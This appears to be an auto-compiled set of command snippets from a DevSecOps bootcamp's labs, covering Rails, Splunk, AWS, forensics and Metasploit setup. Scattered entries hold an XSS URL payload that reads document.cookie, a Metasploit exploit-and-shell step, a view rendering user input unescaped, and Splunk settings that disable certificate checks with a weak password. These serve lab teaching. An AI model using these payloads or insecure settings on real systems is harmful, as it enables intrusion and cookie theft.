### Install and Start MariaDB

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Installs and starts the MariaDB database service on the system.

```bash
$ sudo yum -y install mariadb mariadb-server mariadb-devel
$ sudo systemctl start mariadb.service
```

--------------------------------

### Install Vagrant Plugin and Launch VM

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Navigate to the bootcamp directory, install the vagrant-vbguest plugin, and start the virtual machine.

```bash
cd bootcamp
vagrant plugin install vagrant-vbguest
vagrant up
```

--------------------------------

### Install Node.js and MariaDB

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Installs Node.js and MariaDB server, then starts the MariaDB service. Requires the EPEL repository.

```bash
sudo rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-6.noarch.rpm
sudo yum -y install nodejs
sudo yum -y install mariadb mariadb-server mariadb-devel
sudo systemctl start mariadb.service
```

--------------------------------

### Install Rails and Application Dependencies

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Installs the Rails gem and then installs all project dependencies using Bundler.

```bash
gem install rails --no-ri --no-rdoc
rails new myapp
cd myapp
bundle install
```

--------------------------------

### Setup Rails Goat Application

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Clones the Rails Goat repository, sets the environment to use MySQL, installs dependencies, and sets up the database.

```shell
$ cd ~
$ git clone https://github.com/OWASP/railsgoat.git
$ cd railsgoat
$ touch log/mysql.log
$ export RAILS_ENV=mysql
$ bundle install
$ bundle exec rake db:setup
```

--------------------------------

### Install Metasploit Dependencies and Run msfconsole

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

Installs necessary dependencies for Metasploit and then launches the Metasploit console. Ensure you are in the Metasploit directory.

```bash
$ cd metasploit-framework-master
$ sudo yum -y install libpcap-devel postgresql-devel libsqlite3-dev sqlite-devel
$ bundle install
$ ./msfconsole
```

--------------------------------

### Install Additional Dependencies

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Installs the 'links' web browser and Node.js.

```bash
$ sudo yum -y install links
$ sudo yum -y install nodejs
```

--------------------------------

### Install Application with UserData Script

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md

This script installs necessary packages, sets up services, clones a Rails application, installs its dependencies, and starts the server. It's designed to be embedded within the UserData section of a CloudFormation WebServerInstance resource.

```json
"UserData": {
  "Fn::Base64": {
    "Fn::Join": [
      "",
      [
        "#!/bin/bash -xe\n",
        "rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm\n",
        "yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel\n",
        "yum -y install nodejs mariadb mariadb-server mariadb-devel\n",
        "systemctl enable mariadb.service\n",
        "systemctl start mariadb.service\n",
        "rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm\n",
        "cd /home/ec2-user\n",
        "echo \"export GEM_HOME=~/.gem\" >> .bash_profile\n",
        "echo \"export GEM_PATH=~/.gem\" >> .bash_profile\n",
        "echo \"export RAILS_ENV=mysql\" >> .bash_profile\n",
        "echo \"export PATH=~/.gem/bin:$PATH\" >> .bash_profile\n",
        "su -l -c \"git clone https://github.com/OWASP/railsgoat.git\" ec2-user\n",
        "su -l -c \"gem install bundler\" ec2-user\n",
        "su -l -c \"cd railsgoat && bundle install && bundle exec rake db:setup\" ec2-user\n",
        "su -l -c \"cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &\" ec2-user\n",
        "\n"
      ]
    ]
  }
}
```

--------------------------------

### Start Splunk Universal Forwarder

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Start the Splunk Universal Forwarder service using the provided command. This command assumes Splunk is installed in the default location.

```bash
sudo /opt/splunkforwarder/bin/splunk start
```

--------------------------------

### Install Ruby and Bundler

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Installs Ruby version 2.3.1 using rbenv, sets it as the global version, and installs the Bundler gem.

```bash
rbenv install -v 2.3.1
rbenv global 2.3.1
ruby -v
gem install bundler --no-ri --no-rdoc
```

--------------------------------

### Run Rails Application

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Creates and migrates the database, then starts the Rails server, binding it to all network interfaces.

```bash
bundle exec rake db:create
bundle exec rake db:migrate
bundle exec rails server -b 0.0.0.0
```

--------------------------------

### Install Restacker

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md

Steps to clone, build, and install the Restacker gem. Ensure rbenv is initialized.

```bash
git clone https://github.com/devsecops/restacker.git
cd restacker/source
gem install bundler
bundle install
gem build restacker.gemspec
gem install restacker-0.0.11.gem
rbenv init -
```

--------------------------------

### Restacker Configuration Example

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md

Example of a Restacker configuration file. Ensure this matches instructor-provided details for region, account numbers, and role names.

```yaml
:myapp:
  :region: us-west-2
  :master:
    :label: control
    :account_number: '100352119871'
    :role_name: CTL-my-app-DeploymentAdmin
    :role_prefix: "/dso/ctrl/my-app/"
  :target:
    :label: target
    :account_number: '717986480831'
    :role_name: TGT-dso-DeploymentAdmin
    :role_prefix: "/human/dso/"
```

--------------------------------

### Install Git on Debian

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md

Install Git on Debian-based systems using apt-get. Update package lists before installation.

```bash
sudo apt-get update
sudo apt-get install -y git
```

--------------------------------

### Connect to Vagrant VM

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Connect to the Vagrant virtual machine to begin the setup process.

```bash
$ vagrant ssh
```

--------------------------------

### Install Ruby using rbenv

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Sets up rbenv and ruby-build to manage Ruby versions, then installs and sets Ruby 2.3.1 as the global version.

```shell
$ cd
$ git clone git://github.com/sstephenson/rbenv.git .rbenv
$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile
$ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
$ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
$ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile
$ source ~/.bash_profile
$ rbenv install -v 2.3.1
$ rbenv global 2.3.1
```

--------------------------------

### Database Setup for Rails App

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Creates the database and runs migrations for the Rails application.

```bash
$ cd myapp
$ bundle exec rake db:create
$ bundle exec rake db:migrate
```

--------------------------------

### Install Git on RHEL/CENTOS

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md

Install Git on RHEL or CentOS systems using yum. Update the system before installing.

```bash
sudo yum update -y
sudo yum install -y git
```

--------------------------------

### Install rbenv and ruby-build

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Installs rbenv for Ruby version management and ruby-build plugin for compiling and installing Ruby versions.

```bash
cd
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile
echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
```

--------------------------------

### Install Rails Gem

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Installs the Rails framework gem.

```bash
$ gem install rails
```

--------------------------------

### Install Git on macOS

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md

Use Homebrew to install Git on macOS. Ensure Homebrew is updated before installing.

```bash
brew update
brew install git
```

--------------------------------

### Start Rails Goat Application

Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md

SSH into the EC2 instance, start Splunk and MariaDB, set the Rails environment, set up the database, and run the Rails server.

```bash
$ ssh -i student1.pem ec2-user@54.x.x.x
$ sudo /opt/splunkforwarder/bin/splunk start
$ sudo systemctl start mariadb.service
$ cd ~/railsgoat
$ export RAILS_ENV=mysql
$ bundle exec rake db:setup
$ bundle exec rails server -b 0.0.0.0 -p 8080
```

--------------------------------

### Install Bundler

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Installs the bundler gem, which manages Ruby application dependencies. It suppresses documentation installation to speed up the process.

```shell
$ ruby -v
$ gem install bundler --no-ri --no-rdoc
```

--------------------------------

### Start SSH Agent and Add Key

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Loads your SSH key into memory for authentication. If the ssh-agent is not running, start it with `ssh-agent -s` before using `ssh-add`.

```bash
ssh-add ~/.ssh/studentx.pem
```

--------------------------------

### Install Splunk Universal Forwarder Dependencies and Download

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Set the timezone to UTC, install wget, and download the Splunk Universal Forwarder RPM package. This is a prerequisite for installing Splunk.

```bash
sudo timedatectl set-timezone UTC
sudo yum -y install wget
wget -O splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=6.4.1&product=universalforwarder&filename=splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm&wget=true'
```

--------------------------------

### Build and Install Selfie Gem

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md

Build the Selfie gem from its source code and then install it. This makes the 'selfie' command available for use.

```bash
$ cd selfie
$ gem build selfie.gemspec
$ gem install selfie-1.0.0.gem
```

--------------------------------

### Install Git and Development Tools

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Installs Git and essential development tools required for building Ruby and other dependencies on the EC2 instance.

```bash
sudo yum -y install git
sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
```

--------------------------------

### Install Virtualbox using Homebrew

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Installs Virtualbox on macOS using the Homebrew package manager. Ensure Homebrew is installed before running this command.

```bash
brew cask install virtualbox
```

--------------------------------

### Clone Bootcamp Repository and Launch Vagrant VM

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Creates a directory for DevOps repositories, clones the bootcamp repository, installs the vagrant-vbguest plugin, and launches the Vagrant virtual machine. This process may take some time to complete.

```bash
mkdir $HOME/dso_repos
cd $HOME/dso_repos
git clone git@github.com:devsecops/bootcamp.git
```

```bash
cd bootcamp
vagrant plugin install vagrant-vbguest
vagrant up
```

--------------------------------

### Install Nano Package using Yum

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Installs the 'nano' text editor package using the 'yum' package manager. Requires root privileges.

```bash
yum install nano
```

--------------------------------

### Run Rails Server

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Starts the Rails development server, binding to all network interfaces.

```bash
$ bundle exec rails server -b 0.0.0.0
```

--------------------------------

### Install Nmap

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

Installs the Nmap network scanner using yum. This is a prerequisite for port scanning.

```bash
$ sudo yum -y install nmap
```

--------------------------------

### AWS IAM Access Key Output Example

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md

Example output showing the generated AccessKeyId and SecretAccessKey for an IAM user.

```json
{
  "AccessKey": {
    "UserName": "hacker1",
    "Status": "Active",
    "CreateDate": "2016-06-30T18:34:48.637Z",
    "SecretAccessKey": "...",
    "AccessKeyId": "AKI..."
  }
}
```

--------------------------------

### Install Splunk Universal Forwarder

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md

Installs the Splunk Universal Forwarder package using yum and wget within the UserData script.

```bash
"ln -sf /usr/share/zoneinfo/America/Los_Angeles /etc/localtime\n",
"yum -y install wget\n",
"cd /opt\n",
"wget -O splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=6.4.1&product=universalforwarder&filename=splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm&wget=true'\n",
"rpm -ivh splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm\n"
```

--------------------------------

### Execute Lab Guide for Students

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/README.md

This Ruby code snippet iterates through each student and executes the lab guide. It's used to initiate hands-on activities.

```ruby
Students.each { |student| student.exec lab_guide_3 }
```

--------------------------------

### Install Homebrew on macOS/Linux

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Installs the Homebrew package manager on macOS and Linux systems. This is a prerequisite for installing other tools like Virtualbox and Vagrant.

```bash
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
```

--------------------------------

### Install Splunk Universal Forwarder

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Install the downloaded Splunk Universal Forwarder RPM package using the 'rpm -ivh' command.

```bash
sudo rpm -ivh splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm
```

--------------------------------

### Install Dependencies for Rails Goat

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Installs necessary system packages and development tools required for Rails Goat. Ensure you have root privileges.

```shell
$ sudo yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
$ sudo rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-6.noarch.rpm
$ sudo yum -y install nodejs
$ sudo yum -y install mariadb mariadb-server mariadb-devel
$ sudo systemctl start mariadb.service
```

--------------------------------

### List Installed Applications on JBoss

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Lists the deployed applications within the JBoss web server's work directory.

```bash
sudo ls /mnt/student1/jboss/home/ec2-user/jboss-5.1.0.GA/server/default/work/jboss.web/localhost/
```

--------------------------------

### Install Net-Tools Package

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Installs the 'net-tools' package, which provides network diagnostic utilities like ifconfig and netstat. Uses 'yum' with '-y' for automatic confirmation.

```bash
sudo yum -y install net-tools
```

--------------------------------

### Run Rails Goat Server

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-3.md

Commands to SSH into an AWS instance, set the Rails environment, and start the Rails Goat server. Ensure Rails Goat is already set up from a previous lab.

```bash
$ vagrant ssh
$ export RAILS_ENV=mysql
$ bundle exec rails server -b 0.0.0.0 -p 8080
```

--------------------------------

### Install Vagrant using Homebrew

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Installs Vagrant on macOS using the Homebrew package manager. This tool is used for managing virtual machine environments.

```bash
brew cask install vagrant
```

--------------------------------

### Metasploit msfconsole Prompt

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

This is the interactive prompt for the Metasploit Framework console after successful installation and launch.

```bash
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )
              ||--|| *

       =[ metasploit v4.12.10-dev                         ]
+ -- --=[ 1556 exploits - 902 auxiliary - 268 post        ]
+ -- --=[ 438 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
```

--------------------------------

### Run Rails Goat Server

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Starts the Rails Goat development server, binding to all interfaces on port 8080. Access the application via your instance's public IP address.

```shell
bundle exec rails server -b 0.0.0.0 -p 8080
```

--------------------------------

### Initialize Git Repository and Push to GitHub

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Initializes a Git repository, adds a README, makes the first commit, sets the remote origin to a GitHub repository, and pushes the master branch.

```bash
echo "# myapp" >> README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://github.com/YOUR_USERNAME/myapp.git
git push -u origin master
```

--------------------------------

### Navigate and Provision Linux VM

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Commands to navigate to the project directory, provision, and SSH into a Linux virtual machine.

```bash
$ cd ~/dso_repos/bootcamp/
$ # vagrant provision
$ # vagrant up
$ vagrant ssh
```

--------------------------------

### Clone Bootcamp Repository

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Use these commands in Git Bash to create a directory, navigate into it, and clone the bootcamp repository.

```bash
mkdir dso_repos
cd dso_repos
git clone git@github.com:devsecops/bootcamp.git
```

--------------------------------

### Monitor Cloud-Init Log

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Continuously displays the end of the cloud-init log file to monitor initialization progress. Press Ctrl+C to exit.

```bash
tail -f /var/log/cloud-init.log
```

--------------------------------

### List Key System Directories

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Lists important system directories like /etc, /home, /var, and /bin with detailed information.

```bash
$ ls -ld /etc /home /var /bin
```

--------------------------------

### Compare Relative and Full Path Listings

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Demonstrates the difference between listing a directory using a relative path versus a full path.

```bash
$ ls -l home
$ ls -l /home
$ ls -la
```

--------------------------------

### Generate Scaffold for Bootcamp Model

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Generates a scaffold for the 'Bootcamp' model with specified attributes and applies database migrations.

```bash
$ bundle exec rails generate scaffold Bootcamp name:string description:text dates:string
$ bundle exec rake db:migrate
```

--------------------------------

### List Root Filesystem and Bin Directory Contents

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Lists the contents of the root directory and the /bin directory to explore the filesystem structure.

```bash
$ ls -l /
$ ls /bin
```

--------------------------------

### Download and Unzip Metasploit

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

Downloads the Metasploit framework from an S3 bucket and unzips the archive. This is an alternative to cloning the Git repository.

```bash
$ curl -O https://s3-us-west-2.amazonaws.com/dso-public-bucket/metasploit-framework-master.zip
$ unzip metasploit-framework-master.zip
```

--------------------------------

### List TCP Listening Ports

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Demonstrates two methods to list TCP ports that are currently in a listening state.

```bash
netstat -tulnp | grep LISTEN
```

--------------------------------

### Create File with Root Privileges using sudo

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Uses 'sudo' to create a file in the /etc directory, bypassing regular user permission limitations.

```bash
$ sudo touch /etc/myfile.txt
```

--------------------------------

### Exploit Target and Get Shell

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

Executes the configured Metasploit exploit against the target and obtains a shell connection.

```bash
> exploit
> shell
```

--------------------------------

### Gather Instance Configuration

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md

Use EC2 command-line tools to gather instance configuration details. This is a foundational step for forensic data collection.

```bash
aws ec2 describe-instances --region us-east-1 > instance-config.json
```

--------------------------------

### Count Words Starting with a Specific Letter

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Filters a word list to count words that begin with a specified letter using grep and wc.

```bash
$ grep -e '^g.*' all | wc -l
```

--------------------------------

### XSS JavaScript Test Code

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md

This is an example of JavaScript code that can be used to test for Cross-Site Scripting (XSS) vulnerabilities. It is typically entered into input fields.

```javascript
```

--------------------------------

### SSH into Bastion Host

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Connect to the bastion host using SSH. Replace with your actual student identifier.

```bash
ssh @52.42.52.211
```

--------------------------------

### Extract Command Injection with rex

Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-3.md

Use the rex command to extract the injected command from log events into a field named 'cmd'. This example demonstrates basic field extraction.

```splunk
index=main host= source="/home/ec2-user/railsgoat/log/mysql.log" filename="*"
| rex " filename=(?<cmd>.*) . *"
| rex field=cmd mode=sed "s/\+/ /g"
```

--------------------------------

### Selfie Command Usage

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md

Displays the available options and usage instructions for the Selfie command-line tool. Use this to understand how to configure and run Selfie.

```bash
$ selfie
Usage: selfie [options]
    -r, --region REGION              AWS Region (default: us-west-2)
    -a, --target-account ACCOUNT     Target AWS account to snapshot, without dashes
    -R, --target-role ROLE           Incident response target account role name
    -n INSTANCEID,                   Comma-separated list of instances to snapshot
        --target-instance-list
    -i, --ir ACCOUNT                 The incident response (IR) account to copy snapshots into
    -A, --control-account ACCOUNT    The control plane account number
    -c, --control-role ROLE          Incident response control account role name
    -u, --username USERNAME          Your IAM username, used to grab MFA serial number
    -t, --ticket-id TICKETID         The ticket ID, will be added to snapshot description
    -f, --file-path FILEPATH         The file path to load and resume from
    -p, --profile-name NAME          The AWS credentials profile name
    -b, --bucket BUCKET              The bucket in incident response account for saving security configuration
    -h, --help                       Show this message
        --version                    Show version
```

--------------------------------

### SSH into Vagrant Virtual Machine

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

Connects to the Vagrant virtual machine via SSH. If AWS configuration is missing, running 'vagrant provision' may resolve the issue by executing additional setup commands.

```bash
vagrant ssh
```

```bash
vagrant provision
```

--------------------------------

### Download, Decompress, and Count Words

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Demonstrates downloading a compressed word list, organizing it into a directory, decompressing, and counting the total words.

```bash
$ wget http://download.openwall.net/pub/wordlists/all.gz
$ mkdir words
$ mv all.gz words/
$ cd words
$ gunzip all.gz
$ ls -l
$ wc -l all
```

--------------------------------

### Automate AWS Role Assumption

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/ASSIGNMENTS.md

Use the 'assumer' gem to automate assuming an AWS role into a target account and opening the AWS Console UI. Ensure the 'assumer' gem is installed and necessary AWS credentials/variables are configured.

```bash
assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin -o dso -g -u $AWS_USERNAME
```

--------------------------------

### XSS Attack URL Example

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md

This URL demonstrates an XSS attack by embedding JavaScript within the 'url' parameter. It is designed to execute an alert box showing document cookies. Note that browser compatibility may vary.

```url
http://127.0.0.1/?url=%2Fdashboard%2Fhome#test=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```

--------------------------------

### Configure UserData for Proxy Support

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Add export commands for http_proxy and https_proxy to the UserData script. Ensure these variables are loaded on login by appending them to .bash_profile and configuring git.

```bash
#!/bin/bash -xe
export http_proxy=http://proxy:3128
export https_proxy=http://proxy:3128
rpm -ivh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm
yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
yum -y install nodejs mariadb mariadb-server mariadb-devel
systemctl enable mariadb.service
systemctl start mariadb.service
rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm
cd /home/ec2-user
echo "export GEM_HOME=~/.gem" >> .bash_profile
echo "export GEM_PATH=~/.gem" >> .bash_profile
echo "export RAILS_ENV=mysql" >> .bash_profile
echo "export PATH=~/.gem/bin:$PATH" >> .bash_profile
echo "export http_proxy=http://proxy:3128" >> .bash_profile
echo "export https_proxy=http://proxy:3128" >> .bash_profile
# Keep local and EC2 instance-metadata traffic off the proxy
echo "export no_proxy=localhost,127.0.0.1,169.254.169.254" >> .bash_profile
echo "[http]
    proxy = $http_proxy" >> .gitconfig
chown ec2-user: .gitconfig
su -l -c "git clone https://github.com/OWASP/railsgoat.git" ec2-user
su -l -c "gem install bundler" ec2-user
su -l -c "cd railsgoat && bundle install && bundle exec rake db:setup" ec2-user
su -l -c "cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &" ec2-user
```

--------------------------------

### Attempt to Create File as Non-Privileged User

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Tries to create a file in the /etc directory as a regular user to demonstrate permission restrictions.

```bash
$ touch /etc/myfile.txt
```

--------------------------------

### Create New Rails Application

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Creates a new Rails application named 'myapp' with specific configurations, including MySQL database support and skipping certain Rails features.

```bash
$ rails new --skip-turbolinks --skip-spring \
    --skip-test-unit -d mysql \
    myapp
```

--------------------------------

### Create AWS IAM Access Keys

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md

Create API access keys for the newly created IAM user.

```bash
$ aws iam create-access-key --user-name hacker1
```

--------------------------------

### Upload Configuration to S3

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md

Upload collected configuration files to an S3 bucket for secure storage and analysis.

```bash
aws s3 cp instance-config.json s3://your-forensic-bucket/instance-config.json
aws s3 cp iam-users.json s3://your-forensic-bucket/iam-users.json
aws s3 cp iam-roles.json s3://your-forensic-bucket/iam-roles.json
aws s3 cp iam-policies.json s3://your-forensic-bucket/iam-policies.json
```

--------------------------------

### Check Current User and List Files

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Commands to determine the current logged-in user and list files in the home directory with all details.

```bash
$ whoami
$ ls -la
```

--------------------------------

### Display Raw Description in View

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Modifies the show view for bootcamps to render the description field using the `raw` helper, which bypasses HTML escaping.

```erb

Description: <%=raw @bootcamp.description %>

```

--------------------------------

### Verify AWS CLI Configuration

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/ASSIGNMENTS.md

Run this command to verify that your AWS CLI is configured correctly and can connect to the AWS API. It should return an empty table if successful.

```bash
aws ec2 describe-instances --output table --region us-west-2
```

--------------------------------

### Configure Splunk Inputs

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Configure Splunk Universal Forwarder to monitor log directories for new data. It includes settings for the default host and monitoring specific log paths.

```bash
echo "[default]
host = \$decideOnStartup

[monitor:///home/ec2-user/railsgoat/log/]
recursive=true

[monitor:///var/log/]
recursive=true" | sudo tee /opt/splunkforwarder/etc/system/local/inputs.conf
```

--------------------------------

### Inspect File Permissions

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Shows detailed information about the 'ls' command file, including its permissions, owner, and size.

```bash
$ ls -l /bin/ls
-rwxr-xr-x. 1 root root 117616 Feb 16 10:49 /bin/ls
```

--------------------------------

### Lab 1 Outline

Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-1.md

This snippet outlines the general structure or steps for Lab 1.

```text
* * * * *
```

--------------------------------

### Log in to AWS with Assumer

Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md

Use the 'assumer' tool to log into the target AWS account. Ensure the AWS_USERNAME environment variable is set to your student ID.

```bash
$ unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID
$ assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin \
    -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin \
    -o dso -g -u $AWS_USERNAME
```

--------------------------------

### Configure AWS CLI

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

This command initiates the AWS CLI configuration process. It prompts for access key ID, secret access key, default region, and output format.

```bash
aws configure
```

--------------------------------

### List Partitions on Attached Disk

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Use fdisk to list partitions on a newly attached disk. Replace with the appropriate device ID for the disk (e.g., /dev/xvdf).

```bash
sudo fdisk -l
```

--------------------------------

### Display System Usernames

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Shows the contents of the /etc/passwd file, which contains user account information.

```bash
$ cat /etc/passwd
```

--------------------------------

### Configure Splunk Outputs

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md

Configure Splunk Universal Forwarder to send data to a specified server and port. This includes the SSL settings; server certificate verification is turned off here (`sslVerifyServerCert = false`).

```bash
echo "[tcpout]
defaultGroup = dso-autolb-group

[tcpout:dso-autolb-group]
disabled = false
dropEventsOnQueueFull = 10
server = appliance:9997
sslCertPath = \$SPLUNK_HOME/etc/auth/server.pem
sslPassword = password
sslRootCAPath = \$SPLUNK_HOME/etc/auth/cacert.pem
sslVerifyServerCert = false
useACK = false" | sudo tee /opt/splunkforwarder/etc/system/local/outputs.conf
```

--------------------------------

### SSH into Bastion Instance

